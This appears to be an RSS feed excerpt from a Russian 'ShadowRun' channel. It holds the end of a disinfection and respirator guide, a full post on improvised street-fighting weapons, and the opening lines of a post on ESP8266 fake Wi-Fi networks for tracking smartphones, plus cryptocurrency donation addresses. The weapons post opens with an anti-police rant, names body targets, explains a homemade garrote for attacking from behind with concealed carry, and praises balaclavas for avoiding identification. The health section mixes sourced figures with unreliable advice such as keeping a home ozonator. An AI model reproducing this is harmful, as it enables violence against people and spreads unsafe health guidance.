  <p>Спиртовой обеззараживатель <a href="https://www.bmj.com/content/325/7360/362" target="_blank">следует тщательно втирать </a>в руки и нижнюю часть предплечья в течение как минимум 30 секунд, а затем дать высохнуть на воздухе. Стоит отметить, что есть определенные ситуации, в которых мытье рук водой и мылом предпочтительнее дезинфицирующего средства на основе спирта. Это:</p>
  <p>а)удаление бактериальных спор <a href="https://ru.wikipedia.org/wiki/Clostridium_difficile" target="_blank">Clostridioides difficile</a></p>
  <p>б)удаление с кожи паразитов вроде <a href="https://ru.wikipedia.org/wiki/%D0%9A%D1%80%D0%B8%D0%BF%D1%82%D0%BE%D1%81%D0%BF%D0%BE%D1%80%D0%B8%D0%B4%D0%B8%D0%B8" target="_blank">криптоспоридий</a></p>
  <p>в)удаление некоторых вирусов, например <a href="https://ru.wikipedia.org/wiki/%D0%92%D0%B8%D1%80%D1%83%D1%81_%D0%9D%D0%BE%D1%80%D1%83%D0%BE%D0%BB%D0%BA" target="_blank">вируса Норуолк</a></p>
  <p>(для его уничтожения нужен 95% этанол и экспозиция over 30 минут). Кроме того руки перед обработкой все равно следует вымыть, если они чем-то загрязнены (масла и т.п.).</p>
  <p></p>
  <h2>II. Воздух ~ аэрозоли</h2>
  <p>Гораздо более дискуссионный вопрос — обеззараживание воздушной среды. </p>
  <p><a href="https://figshare.com/articles/Effect_of_Ultraviolet_Germicidal_Irradiation_on_Viral_Aerosols/2993542" target="_blank">В исследовании </a>авторы проверили активность жесткого ультрафиолета (говоря понятным языком — «кварцевой лампы») на вирусные аэрозоли, т.е. на те самые частицы с которыми вирус носится в окружающей среде и попадает в наши легкие (и которые я предлагал улавливать с помощью HEPA/ULPA фильтров). Им удалось установить, что вирусы разных классов по разному реагируют на ультрафиолет. Например, аэрозоли с аденовирусами (вызывающие острые респираторные заболевания) оказались достаточно устойчивы к ультрафиолету.</p>
  <figure class="m_original">
    <img src="https://habrastorage.org/webt/il/yf/if/ilyfif7dia4q_uxakektmck36ei.jpeg" width="241" />
  </figure>
  <p>В их случае снижение количества жизнеспособных вирусных аэрозолей менее чем на 1 логарифм наблюдалось только при дозе ультрафиолетового излучения 2608 мкВт / см2. Но вот зато восприимчивость аэрозолей коронавируса была в 7-10 раз выше, чем у аденовируса. Что интересно, в случае обработки помещения ультрафиолетом, в отличие от бактериальных аэрозолей, не наблюдалось защитного эффекта высокой относительной влажности. Т.е. даже в парилке можно убивать коронавирус с помощью ультрафиолетовой лампы.</p>
  <p>Еще более крутая <a href="https://www.tandfonline.com/action/cookieAbsent" target="_blank">статья </a>была опубликована в журнале Аэрозоли (всё не перескажем, кому нужно - все линки в статье от <a href="https://t.me/shadowruntime" target="_blank">SR</a> активные). В ней авторы оценили эффективность жесткого бактерицидного ультрафиолета на вирусные аэрозоли, притом рассматривали вирусы с различными типами нуклеиновых кислот (одноцепочечная РНК, одноцепочечная ДНК, двухцепочечная РНК; двухцепочечная ДНК) при различной относительной влажности в процессе воздействия ультрафиолета. (<a href="https://t.me/shadowruntime" target="_blank">https://t.me/shadowruntime</a>)</p>
  <p>Для воздушно-капельных вирусов доза ультрафиолета для 90% инактивации составила: 339–423 мкВт с / см2 для одноцепочной РНК, 444–494 мкВт с / см2 для одноцепочнойДНК, 662–863 мкВт с / см2 для двухцепочной РНК и 910–1196 мкВт с / см2. для двухцепочной ДНК. Примечательно, что для всех четырех протестированных классов вирусов для 99% инактивации потребовалась в 2 раза большая доза ультрафиолета, чем нужна была для достижения 90% инактивации.</p>
  <p>Кроме того установили, что воздушно-капельные вирусы с одноцепочечной нуклеиновой кислотой (РНК и ДНК) были более восприимчивы к инактивации ультрафиолетом, чем с двухцепочечными РНК и ДНК. Для всех протестированных вирусов при одинаковой степени инактивации доза ультрафиолета при относительной влажности 85% была выше, чем при относительной влажности 55%. Возможно это связано с тем, что сорбция воды на поверхности вируса обеспечивает защиту от вызываемого ультрафиолетом повреждения ДНК или РНК. Таким образом, данная статья — исчерпывающее руководство по подбору мощности домашнего ультрафиолета. Кстати, доза = время экспозиции*интенсивность излучения. Ну а в том что метод работает — сомнений никаких.</p>
  <p></p>
  <p><strong>Average UV rate constants for animal viruses and phages</strong></p>
  <p><u>Кстати, «пневмония Уханя» — содержит одноцепочную РНК, так что для работы с ним нужно 339–423 мкВт с / см2 ультрафиолета с длиной волны 254 нм (90% дезинфекция воздуха).</u></p>
  <figure class="m_original">
    <img src="https://habrastorage.org/webt/jb/zl/r3/jbzlr38fyqhd5qlmdydzqtpeg5a.jpeg" width="378" />
  </figure>
  <p>Что касается озона, то этот друг крошит все. Без разбора (в том числе и резиновые изделия в помещении). Как и в случае с ультрафиолетом, доза озона для инактивации 99% была в 2 раза выше, чем для инактивации 90%. Было обнаружено, что вирусы с более сложной архитектурой менее восприимчивы к инактивации озона, чем вирусы с простой архитектурой. Кроме того, при одинаковой степени дезактивации воздуха, необходимая концентрация озона при относите��ьной влажности 85% была ниже, чем при относительной влажности 55%. Возможно это связано с образованием большего количества свободных радикалов, которые реагировали с водяным паром. Но тем не менее, вердикт статьи однозначен — озон очень эффективен для дезактивации любых вирусов переносящихся с аэрозолями (воздушно-капельные). Так что, ребятки, компактный озонатор, дома иметь все-таки надо на случай вирусной эпидемии.</p>
  <p></p>
  <h3><strong>Обобщенная картинка дезинфектант/действие на вирус</strong></h3>
  <p><strong>Важно!!! ОЗОН — СИЛЬНЕЙШИЙ ОКИСЛИТЕЛЬ! ОЗОН — ЯД! Работа с ним требует особой осторожности, и распадается он НЕ МГНОВЕННО!</strong></p>
  <p>Перепроверьте семь раз средства защиты, вентиляцию, таймеры на озонаторе перед тем, как запускать процесс дезинфекции. Помните, что самостоятельное озонирование вы делаете на свой страх и риск! (<a href="https://t.me/shadowruntime" target="_blank">https://t.me/shadowruntime</a>)</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/webt/yx/ve/kf/yxvekfungbavl6ysctnyrxzkibg.jpeg" width="960" />
  </figure>
  <h3></h3>
  <h2>III. Про правильные маски</h2>
  <p>Услышал где-то про то, что одноразовые лицевые маски внезапно стали самым продаваемым товаром в Китае в связи с эпидемией. Возмутился, ибо сразу вспомнилось давнее исследование, результаты которого опубликованы в журнале <a href="https://www.thelancet.com/journals/lancet/article/PIIS0140-6736(03)13168-6/fulltext" target="_blank">Lancet</a>. </p>
  <p><strong>Суть — статистически значимую защиту от вируса атипичной пневмонии кое-как обеспечивали только хирургические четырехслойные маски и маски типа «N95». Бумажные одноразовые и обычные трехслойные — эффективны настолько же, насколько эффективен шарф или косынка, обвязанная вокруг лица. Правда позднее была <a href="https://www.ncbi.nlm.nih.gov/pubmed/12783898" target="_blank">опровергнута </a>и эффективность хваленых N95.</strong></p>
  <figure class="m_original">
    <img src="https://habrastorage.org/webt/33/dq/bi/33dqbiiuhjhjrm3tsbq6osjjyzy.jpeg" width="600" />
  </figure>
  <p>Все что могут помочь сделать маски — это снизить риск заражения вирусом через «всплеск» от чихания или кашля и обеспечить некоторую защиту от передачи инфекции из рук в рот. Хотя большинство людей хоть и носят маску, но все-равно суют под нее руку, чтобы потереть лицо/почесать нос и т.п. Плюс практические все забывают, что маску/повязку необходимо менять как можно чаще, максимум — через три часа, в противном случае она сама становится источником инфекции. Примерно об этом же толкует и ВОЗ в своих <a href="https://www.who.int/csr/resources/publications/swineflu/masks_community/ru/" target="_blank">рекомендациях</a>. Так что копеечную маску с собой носить имеет смысл только в одном случае — чтобы отдать ее чихающему/кашляющему гражданину, вместе с рекомендацией «не распространять коронавирус».</p>
  <p></p>
  <p><strong>Возникает вопрос, а есть ли смысл вообще носить маску, чтобы защититься от вирусов в воздухе и какую именно?</strong> Отвечаю! Смысл носить есть, но только полнолицевую, закрывающую глаза (т.к. коронавирусы могут попадать в организм не только через слизистую легких, но и через глаза). Слабая эффективность тряпичной маски как раз-таки и обусловлена и наноразмером частиц вируса, и плохим прилеганием и недостаточной защитой глаз.</p>
  <p></p>
  <h3>Лучший <a href="https://www.ncbi.nlm.nih.gov/pmc/articles/PMC332692/" target="_blank">вариант </a>— это эластомерный (резиновый) полнолицевой респиратор с <a href="https://habr.com/ru/company/tion/blog/385461/" target="_blank">HEPA</a>-фильтром на борту.</h3>
  <figure class="m_column">
    <img src="https://habrastorage.org/webt/_o/t9/tj/_ot9tj0l1gazppzyvnn6m2segoo.jpeg" width="893" />
  </figure>
  <p>Ну или если не полнолицевой, то хотя бы обычный фильтрующий с все тем же HEPA-фильтром + прилегающие очки, вроде тех, что на картинке:</p>
  <figure class="m_original">
    <img src="https://habrastorage.org/webt/lc/1y/xa/lc1yxah3nga2x-87z6vgmag2qnk.jpeg" width="600" />
  </figure>
  <p><strong>или такие, подешевле, попроще - ака очки химика</strong></p>
  <p>Как мы написали выше, первоначально N95 были эффективны сильнее чем обычные тряпичные трехслойные маски (в случае коронавируса атипичной пневмонии), но позднее исследования показали, что эффективность у них не особо. Т.е. при прочих равных работает следующий ряд: трехслойная самая дешевая маска -&gt;четырехслойная хирургическая-&gt;N95. Лучше ищите 3M-ский HEPA респиратор с клапаном 8233 или 8293. Если ничего похожего нет — смотрите обычные респираторы или маски, с противоаэрозольными фильтрами с уровнем защиты Р3 (по классификации 3М), они должны по определению быть HEPA-зированными.</p>
  <p>Кстати, стоит отметить, что в наших магазинах редко бывают маски с классом N95, ибо класс этот взят из стандарта US NIOSH. Респираторы, изготовленные в РФ, маркируются по EN 149:2001 (<a href="http://docs.cntd.ru/document/1200121996" target="_blank">ГОСТ 12.4.294-2015</a>).</p>
  <p>Т.е. примерным аналогом американского N95 будет класс FFP2 (задерживает ~92% аэрозолей, голубой ремешок), N99 — FFP3 (задерживают ~95% аэрозолей, красный ремешок). Дополнительно может быть маркировка NR/R/D = на одну смену/многоразовые/устойчивы к запылению. Кстати, вместо ремешка цветовую маркировку класса может нести на себе клапан выдох (красный = FFP3). В целом замечание для тех, кто «ищет, но не может найти». Берите <u>как минимум </u>маски со сменными картриджами, предназначенные для работы с аэрозолями ЛКМ (краски, лаки и т.п.).</p>
  <p></p>
  <p><strong>В официальном <a href="https://t.me/lab66/103" target="_blank">руководстве</a></strong></p>
  <p>от 3M по выбору масок для медработников имеющих дело с вирусами фигурируют одноразовые респираторы типа 1863 (без клапана), 1873V (с клапаном), 1883 (закрытый клапан), 8835 (с клапаном) и многоразовая полумаска 7501 (02/03) со сменными фильтрующими картриджами 6035 P3R. Есть вероятность, что такие артикулы в вашем городе могут быть недоступны. Тогда можно посмотреть FFP3 (с красными клапанами/ремешками) маски 9163V или 9332+. Обратите внимание, на картинках в приложенном документе люди вместе с респираторами используют герметичные закрытые очки, вроде недорогих, выпускаемых СОМЗ</p>
  <p><a href="https://rosomz.ru/katalog/ochki_zashchitnye_zakrytye/" target="_blank">3НГ-1</a></p>
  <p>.</p>
  <figure class="m_original">
    <img src="https://habrastorage.org/webt/ol/gy/b0/olgyb0fmzjryp7d40empwp9ilte.jpeg" width="636" />
  </figure>
  <p></p>
  <h3><u>Про дезинфекцию использованных масок.</u></h3>
  <p>После дня работы/ношения маску желательно простерилизовать. Самый «щадящий» способ — стерилизацию гамма-лучами даже не советую, но прокипятить/прожарить в стерилизаторе можно. Температуры около сотни градусов полимерам/эластомерам маски вреда не нанесут. Можно проварить струей пара (хотя бы из утюга с гидроударом), избегая попадания на фильтр.</p>
  <p>P.S. Кстати, чихать и кашлять стоит только в носовой платок или в согнутый локоть. Чихнув в ладонь, как правило, правую, мы потом за все хватаемся, жмем друг другу руки и тем самым еще больше разносим инфекцию, чем если бы просто чихнули в пространство.</p>
  <figure class="m_original">
    <img src="https://habrastorage.org/webt/8b/8q/5x/8b8q5xxzylva6hhqpgr63blcrti.jpeg" width="750" />
  </figure>
  <p><strong>На этом всё, тени. Помните, киберсталкеры, безопасность, сука, решает! Оставайтесь с нами, активнее подписывайтесь на наш канал, заходите в гости почаще и приглашайте друзей: <a href="https://t.me/joinchat/AAAAAEWEtm5wXT-zx05Y1w" target="_blank">https://t.me/joinchat/AAAAAEWEtm5wXT-zx05Y1w</a></strong></p>
  <p><strong>Поддержать хактивизм и канал ShadowRun: </strong>327J5WozmU3MTqfDoWvgDoo5NqvimyYCRS (BTC)</p>
  <p>M89UUZaZuXVsGD7LRgFKMDoUM8gd6uTJ3e (LTC)</p>
  <p>0x8f08DaC4d273fC6968283aad70a6677dD9f57642 (ETH)</p>
  <p>P64050430 (Rub Payeer)</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/7db79291c5554231916bd.jpg" width="1200" />
  </figure>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/ryCncbTs4</guid><link>https://teletype.in/@redterror/ryCncbTs4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/ryCncbTs4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Доступное оружие для уличных боёв</title><pubDate>Sun, 12 May 2019 14:46:14 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/f0/f05f2c03-b50b-4609-b18d-126ad2cff1c8.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/c8/c86a7552-619b-40f9-857c-9e76a8e30951.jpeg"></img>Нихау, бегущие в тенях! Привет, случайный подписчик.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/c8/c86a7552-619b-40f9-857c-9e76a8e30951.jpeg" width="1280" />
  </figure>
  <p><strong>Нихау, бегущие в тенях! Привет, случайный подписчик.</strong></p>
  <p><strong>&quot;-Когда убьют, тогда и приходите&quot;, &quot;Он же депутат и он не виноват ни в чём&quot;... Знакомые фразы? Да, да, именно так обычным гражданам и отвечают в полиции. Всё, что могут нынешние менты - это, прикрываясь своими сраными погонами и формой (от дизайнера-гея), убивать молодых парней в околотках и сажать за лайки с репостами. Ах, да, ещё валить инвалидов, стариков и женщин.</strong></p>
  <p><strong>Наступает такое тяжёлое время, когда нужно уметь защитить себя самостоятельно. Помните, киберсталкеры, с зоны выйти ещё можно, а вот из могилы - уже никогда.</strong></p>
  <p><strong>Поехали:</strong></p>
  <h2><strong>ОРУЖИЕ</strong></h2>
  <p><strong>ПРЕДМЕТЫ ДЛЯ МЕТАНИЯ</strong></p>
  <p><strong>Легкие предметы</strong>– это все что может, попав в глаза противнику хотя бы на доли секунды отвлечь его внимание. Это может быть: песок, монетки, перец, мелкие камешки, короче все сыпучие предметы — в принципе любой предмет можно кинуть в глаза противника который окажется под рукой для того чтобы временно ослепить его. Бросок выполняется хлестким движением без замаха.</p>
  <p>Так же в этих целях можете использовать любые распылители и разбрызгиватели. Просто направьте их в лицо и нажмите на кнопку.</p>
  <p>Главная задача легкого метательного оружия – это атака глаз противника, для отвлечения его внимания, от более мощной последующей атаки.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/3d/3d77472d-c585-4d2a-af57-796e500fb367.jpeg" width="800" />
  </figure>
  <figure class="m_column">
    <img src="https://teletype.in/files/80/809a8130-8414-452a-a17a-e59aad3f2708.jpeg" width="4272" />
  </figure>
  <p><strong>Тяжелые предметы</strong>– это камни или предметы вроде камней, которые можно метать поражая противника.</p>
  <p><strong>Булыжник - оружие пролетариата.</strong></p>
  <p>Опять же кидайте камни в уязвимые места. Камни - это древнейшее оружие человека. Если не самое первое. Представьте вы поднимите камень и бросите в лоб нападающему на вас с ножом, если попадете вы его вырубите, и преимущество будет на вашей стороне. Поэтому с помощью подручного оружия вы можете даже успешно противостоять противникам вооруженным холодным оружием. В конце концов, это наилучший выбор, когда ничего более существенного нет под рукой (я имею ввиду АК-47). (Статья канала ShadowRun)</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/07/073f7729-c11c-4419-a09b-c9970538efba.jpeg" width="1024" />
  </figure>
  <p><strong>КОРОТКИЕ ПАЛОЧКИ И РУЧКИ</strong></p>
  <p>Вы зажимаете любую короткую палочку длиной 15-20 см в кулаке. И у вас получается отличное оружие для самообороны. Вся ваша сила концентрируется на острых краях палочки. И вы можете наносить очень болезненные удары в уязвимые точки противника. (В японской боевой традиции такая палочка называется Явара, и использовалась она для хранения святой воды. Вот такая невинная палочка. Превращаемая в умелых руках в грозное оружие.)</p>
  <p>Итак основные цели для атаки: висок, глаза, пах, горло, ключица, кисть противника. (В карманах как правило есть ключи и ручки, посмотрите сами, что у вас в карманах на данный момент и что можно использовать как боевое оружие.)</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/b7/b72a8f99-b8cd-4a07-95d2-79c831186738.jpeg" width="800" />
  </figure>
  <p><strong>КОРОТКИЕ ПАЛКИ (ДУБИНКИ)</strong></p>
  <p>В качестве короткой дубинки можете использовать любые предметы, длиной 50-100 см. Вы можете наносить удары по рукам, голове, шее и в область паха противника. Но лучше вместо ударов использовать тычки: в солнечное сплетение, в лицо, в пах, в живот они будут достаточно болезненны и их труднее заметить и соответственно труднее отбить. (эксклюзивная статья от @shadowruntime)</p>
  <p>Используйте комбинации ударов. Так же вполне можно и фехтовать такой палкой – наносить и отбивать удары противников на расстоянии. При фехтовании важна работа кисти. Это дает необходимую скорость и силу. Так же короткую палку можно использовать для заломов суставов рук и даже ног.</p>
  <p><strong>(Вообще палка, дубинка, дубина имеет такую физическую особенность что при вращении относительно точки опоры, скорость (точнее угловая скорость) увеличивается пропорционально длине — скорость на «острие» становится просто потрясающей... </strong>Поэтому при нанесении ударов палкой используйте вращение плечом, локтем, запястьем. Этот же закон используется при фехтовании шпагой, саблей, мечом.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/52/52c3a3f9-7fb8-49fe-9d57-9512678b4f17.jpeg" width="750" />
  </figure>
  <p><strong>ДУБИНЫ</strong></p>
  <p>Особенного искусства во владении дубиной нет. При достаточной физической силе ею можно наносить такие удары, что от них трудно защититься даже и группе нападающих, или человеку вооруженному ножом. Думаю это наиболее мощное оружие для ближнего рукопашного боя. Но требует пространства, для нанесения полноценных ударов. Захват наиболее удобно проводить двумя руками.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/d1/d187186d-031f-46be-b245-f1b411a1d47b.jpeg" width="1600" />
  </figure>
  <p><strong>ДЛИННЫЕ ПАЛКИ</strong></p>
  <p>Держите их как солдат держит ружье, выполняйте тычки в лицо, горло, область паха, живот или грудь противника. Бейте задней частью палки. Вообще фехтование на палках это древнее и благородное искусство боя, которое имеет такую же давнюю традицию. Но вероятность того что вы в современных условиях будете фехтовать на шестах совершено невелика. Все таки время шеста как оружия давно прошло. Да и носить шест с собой в современном мире несколько нелепо. Разве что вы случайно схватите палку несколько похожую по размерам и габаритам на шест, и будете использовать ее по всем правилам фехтования на шестах. В принципе всегда будет оружие в реальном поединке разнородным и в различных сочетаниях. Например нож – дубина. Нож-шест. Нож- нож. Давайте рассмотрим основы боя на палках. Исследуем общие принципы использования шеста, и рассмотрим его действие против различного оружия. (эксклюзивная статья от @shadowruntime)</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/07/07b66137-0a5a-4409-b745-7839265f3c1d.jpeg" width="1280" />
  </figure>
  <p><strong>КОЛЮЩИЕ ПРЕДМЕТЫ</strong></p>
  <p>Это любые предметы которыми можно нанести колотые раны. Это шила, ножи, вилы, заточенные штыри. Соответственно наиболее эффективным является нанесение ударов в уязвимые части тела противника. (эксклюзивная статья от @shadowruntime)</p>
  <p>Уколы наносятся простым поступательным движение – тычком или ударом.</p>
  <figure class="m_custom">
    <img src="https://teletype.in/files/5e/5e7370cf-4127-46c8-978c-172a21e98b22.jpeg" width="800" />
  </figure>
  <figure class="m_column">
    <img src="https://teletype.in/files/c0/c024e989-55db-45a9-a0fd-86ebb1b34b59.jpeg" width="1280" />
  </figure>
  <p><strong>РЕЖУЩИЕ ПРЕДМЕТЫ</strong></p>
  <p>Это любые предметы, имеющие острую режущую кромку, которой соответственно можно наносить противнику режущие повреждения. Это ножи, бритвы, лезвия и тому подобное, кроме этого в качестве режущих предметов можно использовать разнообразные металлические или пластиковые полотна. Удары режущими предметами могут движением руки как в вертикальной и горизонтальной, так и в диагональной плоскости — под любым углом.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/61/61af2857-9e7c-4501-ae31-ab1c5bc45b1a.jpeg" width="970" />
  </figure>
  <p><strong>КОЛЮЩЕ-РЕЖУЩИЕ ПРЕДМЕТЫ</strong></p>
  <p>Это любые предметы которыми возможно наносить как колотые и резаные повреждения, так и колото-резаные повреждения. А наиболее яркий представитель данного вида – нож – идеальное оружие для боя на ближней дистанции. (эксклюзивная статья от @shadowruntime)</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/fc/fc3edac0-a7fd-4be0-8527-a6ab5d5fd217.png" width="960" />
  </figure>
  <p><strong>ЦЕПИ И ВЕРЕВКИ</strong></p>
  <p>Могут быть использованы как для нанесения хлестких ударов, так и для захватов и связываний.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/b0/b0f137ed-43dd-45f9-be93-3dd2ffb42453.jpeg" width="660" />
  </figure>
  <p><strong>ХЛЫСТЫ</strong></p>
  <p>Вы конечно не можете ударить им противника, но хлестко ударить по глазам или в область паха – вполне возможно. (эксклюзивная статья от @shadowruntime)</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/13/1348a8e3-0fec-4c3e-90dc-05302e7cc359.jpeg" width="800" />
  </figure>
  <p><strong>ГАРРОТА</strong></p>
  <p>Или попросту удавка. Делается легко самостоятельно из гитарной струны и изоленты/скотча. Отлично подходит для нападения со спины, если вы наносите первый удар. Мало заметна. Пригодна для скрытного ношения.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/55/556da279-8338-4f0c-a8c2-7df45c729ad7.png" width="926" />
  </figure>
  <p><strong>ПРАЩА САМОДЕЛЬНАЯ</strong></p>
  <p>Подойдёт только очень умелому бойцу.</p>
  <p>Плюсы:</p>
  <ol>
    <li>Отлично подходит для скрытного ношения в виде обычного ремня на поясе.</li>
    <li>Снаряды (камни) всегда под рукой.</li>
    <li>Снаряд, выпущенный из пращи гарантированно разбивает голову человеку на расстоянии до 25м.</li>
    <li>Простейшее оружие с Древнейших времён</li>
  </ol>
  <p>Минусы:</p>
  <ol>
    <li>Достаточно тяжело сделать грамотно самому</li>
    <li>Нужен нехилый навык и опыт владения данным оружием</li>
    <li>Нужны природная меткость и ловкость</li>
  </ol>
  <figure class="m_column">
    <img src="https://teletype.in/files/b1/b1c6ad4f-9ec9-4a6a-8dc4-6b54aa55719a.jpeg" width="1280" />
  </figure>
  <p><strong>СЕЛЬСКОХОЗЯЙСТВЕННЫЙ И ШАНЦЕВЫЙ ИНСТРУМЕНТ</strong></p>
  <p>Тут, думаю, всё понятно. Вилы, серпы, топоры, косы - отличное оружие простых людей с древнейших времён. (эксклюзивная статья от @shadowruntime)</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/7a/7a34c98f-a751-4372-b535-25c456ed09e7.jpeg" width="800" />
  </figure>
  <figure class="m_column">
    <img src="https://teletype.in/files/76/762c7a99-e475-4dc1-a8ff-322258c6c571.jpeg" width="1086" />
  </figure>
  <figure class="m_column">
    <img src="https://teletype.in/files/72/72fa9409-e0bf-4798-bc8e-1a4bae560586.jpeg" width="1323" />
  </figure>
  <p><strong>РАБОЧИЙ ИНСТРУМЕНТ</strong></p>
  <p>Тут всё просто. Берёшь кувалду потяжелее и лупишь со всей дури. Если дури много, то даже бронежилет не спасёт.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/a1/a1d88bb7-e63f-44f7-bc4c-7780a53aed12.jpeg" width="1024" />
  </figure>
  <p><strong>ОГНЕСТРЕЛЬНОЕ ОРУЖИЕ</strong></p>
  <p>Вероятность попадания в реальной ситуации огнестрельного оружия в руки обыкновенному человеку достаточно невелика. (Допустим при нападении грабителей на супермаркет вы запустили мороженой курицей в голову грабителю и он выронил свое помповое ружье, вы его подобрали но что же вам с ним делать если вы ни разу не держали его в руках. ) (эксклюзивная статья от @shadowruntime)</p>
  <p>Итак какое огнестрельное оружие может попасть в руки обычному человеку:</p>
  <ol>
    <li>револьверы</li>
    <li>автоматические пистолеты</li>
    <li>ружья</li>
    <li>винтовки</li>
    <li>автоматические винтовки</li>
    <li>и наконец автоматы (скорее всего это АК-47 или его модификации что одно и то же)</li>
  </ol>
  <p>думаю что прежде всего нужно уяснить принципы, которые собственно и помогают применять практически любое огнестрельное оружие.</p>
  <p>Во первых вы сразу же можете оружием нанести удар, если уж совсем нет времени, но смотрите оружие может быть заряжено и снято с предохранителя. Так что держите стволом вперед или от себя.</p>
  <p>Во вторых вы можете естественно выстрелить в нападающего. Для этого вам нужно снять оружие с предохранителя, если необходимо взвести его и произвести выстрел. Но у каждого вида огнестрельного оружия есть свои особенности. В принципе благодаря художественным фильмам мы можем воспользоваться любым видом оружия, на экране в качестве учебного пособия мы видели это сотни раз.</p>
  <p>При этом как можно заметить — любое легкое стрелковое оружие сделано таким образом что им легко и просто было воспользоваться — иначе ведь его просто не будут покупать.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/13/13e70c0e-f11a-480e-baef-2b953fdb923e.jpeg" width="909" />
  </figure>
  <p><strong>САМОДЕЛЬНЫЕ ДЫМОВЫЕ И ХИМИЧЕСКИЕ ШАШКИ</strong></p>
  <p><a href="https://telegra.ph/Dymovuha-svoimi-rukami-v-domashnih-usloviyah-01-26" target="_blank">https://telegra.ph/Dymovuha-svoimi-rukami-v-domashnih-usloviyah-01-26</a></p>
  <figure class="m_column">
    <img src="https://teletype.in/files/95/95ac2b7d-0bda-443f-8c9b-12a9ae770c97.jpeg" width="1280" />
  </figure>
  <p><strong>А теперь поговорим про доступную защиту.</strong></p>
  <h2>ЗАЩИТА</h2>
  <p><strong>ЩИТЫ</strong></p>
  <p>Любые крупногабаритные предметы могут быть использованы в качестве «щитов» для простого перекрытия линии удара. Ими можно отбиваться даже от ножа и палки. Атакуйте гранью, если она достаточно жесткая. (например простая книга)</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/25/2501818a-a96d-4271-bcca-0e7f16aa9688.jpeg" width="2000" />
  </figure>
  <p><strong>КОСУХА</strong></p>
  <p>Настоящая байкерская косуха отлично защищает от режущих ранений и смягчает ударно-дробящие повреждения. А ещё она стильно выглядит.</p>
  <figure class="m_custom">
    <img src="https://teletype.in/files/92/923632cb-3e9b-486b-b70c-15d03316dfc0.jpeg" width="564" />
  </figure>
  <p><strong>БАЛАКЛАВА</strong></p>
  <p>Защита лица. И ещё в ней легче остаться неопознанным.</p>
  <figure class="m_custom">
    <img src="https://teletype.in/files/bc/bcfd13fa-1fa8-424e-93ee-e9c27ce22fba.jpeg" width="699" />
  </figure>
  <p><strong>БЕРЦЫ</strong></p>
  <p>Удобная толстая подошва, фиксация голеностопа, не развалятся после первого удара.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/81/81eb083f-45a1-4db5-99d8-79ff8887d118.jpeg" width="1100" />
  </figure>
  <p><strong>ШЛЕМ БОКСЁРСКИЙ, ХОККЕЙНЫЙ ИЛИ МОТОЦИКЛЕТНЫЙ</strong></p>
  <p>Голова нам нужна. Целая и невредимая. Хотя некоторые в неё только едят. Но это тоже важно. Защитить голову можно при помощи любого шлема, имеющегося в продаже.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/ff/ff5d0795-c885-42d6-affe-cbce43b4077f.jpeg" width="1000" />
  </figure>
  <figure class="m_column">
    <img src="https://teletype.in/files/fd/fdf51c2b-cd27-46a7-b809-b5c6f40e1b2a.jpeg" width="900" />
  </figure>
  <p><strong>На этом всё, тени. Помните, киберсталкеры, безопасность, сука, решает! Оставайтесь с нами, активнее подписывайтесь на наш канал, заходите в гости почаще и приглашайте друзей: <a href="https://t.me/joinchat/AAAAAEWEtm5wXT-zx05Y1w" target="_blank">https://t.me/joinchat/AAAAAEWEtm5wXT-zx05Y1w</a></strong></p>
  <p><strong>Поддержать хактивизм и канал ShadowRun: </strong>327J5WozmU3MTqfDoWvgDoo5NqvimyYCRS (BTC)</p>
  <p>M89UUZaZuXVsGD7LRgFKMDoUM8gd6uTJ3e (LTC)</p>
  <p>0x8f08DaC4d273fC6968283aad70a6677dD9f57642 (ETH)</p>
  <p>P64050430 (Rub Payeer)</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/7db79291c5554231916bd.jpg" width="1200" />
  </figure>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/BkfELatmV</guid><link>https://teletype.in/@redterror/BkfELatmV?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/BkfELatmV?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Система на базе микроконтроллера ESP8266 для отслеживания смартфонов</title><pubDate>Sat, 26 Jan 2019 11:36:10 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/1e/1e7a0057-db59-4b91-a4af-cb5275b76467.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/01/0110ba03-54c3-47e5-aeeb-dc433514a2ff.png"></img>В этой статье мы рассмотрим создание сотен поддельных сетей с распространенными именами с использованием дешевого IoT-устройства, запрограммированного на базе платформы Arduino.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/01/0110ba03-54c3-47e5-aeeb-dc433514a2ff.png" width="1920" />
  </figure>
  <p><strong>В этой статье <a href="https://t.me/shadowruntime" target="_blank">мы</a> рассмотрим создание сотен поддельных сетей с распространенными именами с использованием дешевого IoT-устройства, запрограммированного на базе платформы Arduino.</strong></p>
  <p><strong>Поехали:</strong></p>
